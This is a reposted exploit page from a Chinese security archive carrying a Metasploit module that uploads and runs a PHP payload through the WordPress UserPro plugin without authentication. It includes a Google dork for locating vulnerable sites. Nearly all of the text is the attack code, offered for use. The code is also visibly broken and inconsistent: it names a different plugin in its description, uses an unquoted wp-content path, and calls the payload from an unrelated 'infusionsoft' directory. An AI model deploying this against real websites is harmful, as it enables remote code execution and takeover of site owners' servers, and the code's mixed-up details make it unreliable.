首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
WordPress Userpro Remote File Upload
来源:metasploit.com 作者:T3rm!nat0r5 发布时间:2016-10-25   
# Exploit Title : Wordpress Userpro Remote File Upload
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://userproplugin.com/
# Google Dork : inurl:/wp-content/plugins/userpro/
# Date : 10/20/2016
# Tested on : Windows10/Linux
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::HTTP::Wordpress
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Wordpress Userpro unauthorization Upload
Vulnerability',
      'Description'    => %q{
        This module exploits an arbitrary PHP code upload in the
wordpress Ifileupload plugin,
		The vulnerability allows for unauthorization file
        upload and remote code execution.
      },
      'Author'         =>
        [
          'T3rm!nat0r5',
          'termijan <poyaterminator@gmail.com>'
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['Ref', 'http://priv8.termijan/'],
        ],
      'Privileged'     => false,
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [['userpro', {}]],
      'DisclosureDate' => 'Oct 20 2016',
      'DefaultTarget'  => 0)
    )
  end

  def check
    res = send_request_cgi(
      'uri'    => normalize_uri(wordpress_url_plugins, 'userpro',
'userpro', 'lib', 'fileupload','fileupload.php')
    )

    if res && res.code == 200 && res.body =~ /Code Generator/ &&
res.body =~ /userpro/
      return Exploit::CheckCode::Detected
    end

    Exploit::CheckCode::Safe
  end

  def exploit
    php_pagename = rand_text_alpha(8 + rand(8)) + '.php'
    res = send_request_cgi({
      'uri'       => normalize_uri(wp-content, 'plugins',
                     'userpro', 'lib', 'fileupload' , 'fileupload.php'),
      'method'    => 'POST',
      'vars_post' =>
      {
        'fileNamePattern' => php_pagename,
        'fileTemplate'    => payload.encoded
      }
    })

    if res && res.code == 200 && res.body && res.body.to_s =~ /Creating File/
      print_good("#{peer} - Our payload is at: #{php_pagename}.
Calling payload...")
      register_files_for_cleanup(php_pagename)
    else
      fail_with("#{peer} - Unable deploy payload, server returned #{res.code}")
    end

    print_status("#{peer} - Calling payload ...")
    send_request_cgi({
      'uri'       => normalize_uri(wordpress_url_plugins, 'infusionsoft',
                     'Infusionsoft', 'utilities', php_pagename)
    }, 2)
  end

end
# Exploit by T3rm!nat0r5

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Deluge 1.3.13 - Denial Of Serv
·Panda Security PSEvents Privil
·TrendMicro InterScan Web Secur
·Microsoft Windows x86 NDISTAPI
·Oracle VM VirtualBox 4.3.28 -
·Network Scanner 4.0.0 - SEH Lo
·Linux Kernel 2.6.22 < 3.9 (x86
·WSearch service (windows) - pe
·FreePBX 10.13.66 - Remote Comm
·SmallFTPd 1.0.3 - 'mkd' Comman
·Linux Kernel 2.6.22 < 3.9 - 'D
·Komfy Switch with Camera DKZ-2
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved